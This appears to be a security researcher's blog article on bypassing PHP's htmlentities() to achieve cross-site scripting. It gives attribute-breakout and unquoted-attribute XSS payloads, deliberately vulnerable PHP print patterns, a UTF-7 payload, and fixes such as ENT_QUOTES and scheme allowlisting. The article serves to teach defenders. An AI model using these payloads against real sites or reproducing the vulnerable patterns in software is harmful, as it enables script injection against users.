Bypassing HTML Entities With JavaScript

[Security researcher Paulos Yibelo shares with HOC how he bypasses htmlentities().]

Well, I don't know how to break it to you: you just can't, if the function is used properly and exactly where it should be. But most developers probably don't use it the right way, since it's almost a norm for some developers not to use built-in functions properly :P. So I will talk about some of the cases I came across while pentesting. htmlentities() and htmlspecialchars() are functions mainly intended to filter out cross-site scripting (XSS) attacks.

But I can promise you that you can build a better function if you handle a lot of user input, since that's where most exploitation scenarios begin. How? Well, the functions convert the characters <, >, &, " and ' into HTML entities. So without those it seems there can be no XSS. Or can there? Well, I can think of one case. Something like javascript:alert(1); passes through untouched, since none of its characters are converted to entities, and it will execute if it lands in an attribute that accepts a URL or script... but there is a limitation to this. Without "> or a similar technique we cannot break out of the attribute we are inside.
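To see which characters actually change, here is a minimal PHP sketch. The helper name encode_legacy_default is made up for illustration, and the flags are spelled out (ENT_COMPAT, which was the default before PHP 8.1) so the result does not depend on the PHP version you run it on.

```php
<?php
// Hypothetical helper: htmlentities() with the pre-8.1 default flags made explicit.
function encode_legacy_default(string $input): string
{
    return htmlentities($input, ENT_COMPAT | ENT_HTML401, 'UTF-8');
}

// Angle brackets and double quotes are converted to entities.
echo encode_legacy_default('<b>"hi"</b>'), PHP_EOL;
// prints: &lt;b&gt;&quot;hi&quot;&lt;/b&gt;

// Nothing in this string is on the list, so it comes back unchanged.
echo encode_legacy_default('javascript:alert(1);'), PHP_EOL;
// prints: javascript:alert(1);
```

The second call is the whole point: the encoder has nothing to do, so whether the string is dangerous depends only on where it is printed.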

Also, the value attribute in HTML is not vulnerable on its own, since it only holds a string and we need a place where scripts can execute... something like href or onclick would do. But who would make such a foolish mistake, right? Well, you wouldn't believe it if I told you that even big companies like Facebook do. Have you seen code like this?

print '<img src="'.htmlentities($url).'">';

or even

print "<a href='".htmlentities($url)."'>Click Here</a>";

javascript:alert(1); will bypass it because it contains none of the characters that get filtered. But notice a limitation here? Our code only executes if the user clicks the Click Here link. So that's a huge limitation. Or is it? The HTML will become something like

<a href='javascript:alert(1);'>Click Here</a>

But we want to break out of the href attribute and execute more malicious JavaScript. But how? If we try to break out of it using '> it shouldn't work, since both of those characters are filtered... and the code would become something like

<a href='javascript:alert(1);&#039;&gt;'>Click Here</a>

Right? Well, not exactly. By default htmlentities() does not encode the single quote ('); you have to pass a flag called ENT_QUOTES to get that. (This is the default before PHP 8.1, which switched the default flags to ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML401.) So the real output when a value like javascript:alert(1);'> is given is

<a href='javascript:alert(1);'&gt;'>Click Here</a>

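There is hope! We broke out of the attribute, so giving a value like

javascript:alert(1);' onfocus=alert(1); autofocus

will output HTML source like

<a href='javascript:alert(1);' onfocus=alert(1); autofocus'>Click Here</a>

Note that the template's own closing quote is still printed after our input and sticks to the last attribute name; ending the payload with a throwaway attribute such as x=' absorbs it.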
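The breakout can be reproduced with a few lines of PHP. This is only a sketch: render_link_compat is a hypothetical helper that mirrors the vulnerable print statement, and ENT_COMPAT is passed explicitly to reproduce the old default on any PHP version. Note that the template's closing quote is still emitted after the payload, which is why the second payload ends with a throwaway x=' attribute.

```php
<?php
// Hypothetical helper mirroring the vulnerable pattern: a single-quoted
// attribute encoded with ENT_COMPAT, which leaves ' untouched.
function render_link_compat(string $url): string
{
    $encoded = htmlentities($url, ENT_COMPAT | ENT_HTML401, 'UTF-8');
    return "<a href='" . $encoded . "'>Click Here</a>";
}

// The single quote closes href early; the template's own quote trails behind.
echo render_link_compat("javascript:alert(1);' onfocus=alert(1); autofocus"), PHP_EOL;
// prints: <a href='javascript:alert(1);' onfocus=alert(1); autofocus'>Click Here</a>

// A dummy attribute at the end swallows the trailing quote.
echo render_link_compat("javascript:alert(1);' onfocus=alert(1); autofocus x='"), PHP_EOL;
// prints: <a href='javascript:alert(1);' onfocus=alert(1); autofocus x=''>Click Here</a>
```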

So wow... our final payload to bypass the filter would look something like

paulos' onfocus=alert(0); autofocus x='

It successfully bypasses htmlentities() and prints out the source

<a href='paulos' onfocus=alert(0); autofocus x=''>Click Here</a>

Successful exploitation of htmlentities(). So why not pass the flag that encodes the single quote (') and make our code secure? Something like

print "<a href='".htmlentities($url, ENT_QUOTES)."'>Click Here</a>";
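A quick way to check what ENT_QUOTES changes is to run the same payloads through it. The sketch below uses a hypothetical helper, render_link_quotes, wrapped around the print statement above; ENT_HTML401 and UTF-8 are stated explicitly as assumptions about the page.

```php
<?php
// Hypothetical helper: same single-quoted template, but with ENT_QUOTES.
function render_link_quotes(string $url): string
{
    $encoded = htmlentities($url, ENT_QUOTES | ENT_HTML401, 'UTF-8');
    return "<a href='" . $encoded . "'>Click Here</a>";
}

// The single quote is now an entity, so the payload stays inside href.
echo render_link_quotes("paulos' onfocus=alert(0); autofocus"), PHP_EOL;
// prints: <a href='paulos&#039; onfocus=alert(0); autofocus'>Click Here</a>

// A javascript: URL has nothing to encode and is printed as-is.
echo render_link_quotes('javascript:alert(1);'), PHP_EOL;
// prints: <a href='javascript:alert(1);'>Click Here</a>
```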

Well, now we can't break out of the attribute we are inside, but JavaScript can still execute in it: a javascript: URL in href still works. The value attribute, however, is off limits; we cannot execute JavaScript inside it. But when you find code like:

print "<input type='text' value=".htmlentities($value, ENT_QUOTES).">";

the value attribute becomes vulnerable even with ENT_QUOTES, because the attribute value is not quoted. A payload like

paulos onmouseover=alert(1);

needs no quote or angle bracket to add a new attribute, and produces HTML like

<input type='text' value=paulos onmouseover=alert(1);>

Cool.
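Here is a small sketch of the unquoted case next to a quoted one. Both helper names are hypothetical; the only difference between them is whether the template puts quotes around the value.

```php
<?php
// Hypothetical helper: the vulnerable template, value attribute left unquoted.
function render_input_unquoted(string $value): string
{
    $encoded = htmlentities($value, ENT_QUOTES | ENT_HTML401, 'UTF-8');
    return "<input type='text' value=" . $encoded . ">";
}

// Hypothetical helper: same encoding, but the value is wrapped in double quotes.
function render_input_quoted(string $value): string
{
    $encoded = htmlentities($value, ENT_QUOTES | ENT_HTML401, 'UTF-8');
    return '<input type="text" value="' . $encoded . '">';
}

$payload = 'paulos onmouseover=alert(1);';

// The space ends the unquoted value, so onmouseover becomes a real attribute.
echo render_input_unquoted($payload), PHP_EOL;
// prints: <input type='text' value=paulos onmouseover=alert(1);>

// Inside quotes the same payload is just text.
echo render_input_quoted($payload), PHP_EOL;
// prints: <input type="text" value="paulos onmouseover=alert(1);">
```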

So leaving out the quotes made us vulnerable; we will just use quotes then. I recommend not using single quotes around attributes, though: your code becomes vulnerable the moment you forget the ENT_QUOTES flag, which you probably will.
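Putting those recommendations together, one possible shape for a link helper is sketched below. It is an assumption-laden example, not a complete defence: safe_href and render_link are hypothetical names, the http/https allowlist is my own choice to deal with javascript: URLs in href, and anything without an allowed scheme (including relative URLs) is simply replaced with #.

```php
<?php
// Hypothetical helper: returns an encoded URL for use inside a double-quoted
// href, or '#' when the scheme is not explicitly allowed.
function safe_href(string $url, array $allowedSchemes = ['http', 'https']): string
{
    $scheme = parse_url($url, PHP_URL_SCHEME);
    if (!is_string($scheme) || !in_array(strtolower($scheme), $allowedSchemes, true)) {
        return '#'; // no scheme, unparsable URL, or a scheme such as javascript:
    }
    return htmlentities($url, ENT_QUOTES | ENT_HTML401, 'UTF-8');
}

// Hypothetical helper: always double-quotes the attribute.
function render_link(string $url): string
{
    return '<a href="' . safe_href($url) . '">Click Here</a>';
}

echo render_link('javascript:alert(1);'), PHP_EOL;
// prints: <a href="#">Click Here</a>

echo render_link('https://example.com/a?b=1&c=2'), PHP_EOL;
// prints: <a href="https://example.com/a?b=1&amp;c=2">Click Here</a>
```

Rejecting everything that is not on the list is deliberate: it is easier to reason about than trying to enumerate dangerous schemes.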

But that isn't all... attackers can still attack your application using a different character set, UTF-7, even when you use htmlentities() properly. So unless you protect your code by explicitly setting your charset to UTF-8, or any charset other than UTF-7, you are still vulnerable to XSS.
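The reason is easy to demonstrate: a script tag written in UTF-7 contains none of the characters htmlentities() looks for. The sketch below shows that, plus a hypothetical helper, content_type_header, that builds the header you would send to declare the charset explicitly. Whether a given browser would ever treat a page as UTF-7 is outside what this code can show.

```php
<?php
// "<script>alert(1)</script>" written in UTF-7: only +, -, /, letters,
// digits and parentheses, none of which htmlentities() rewrites.
$utf7Payload = '+ADw-script+AD4-alert(1)+ADw-/script+AD4-';
$encoded = htmlentities($utf7Payload, ENT_QUOTES | ENT_HTML401, 'UTF-8');

var_dump($encoded === $utf7Payload);
// prints: bool(true)

// Hypothetical helper: builds the header line that pins the page charset.
function content_type_header(string $charset = 'UTF-8'): string
{
    return 'Content-Type: text/html; charset=' . $charset;
}

// In a web request you would call: header(content_type_header());
echo content_type_header(), PHP_EOL;
// prints: Content-Type: text/html; charset=UTF-8
```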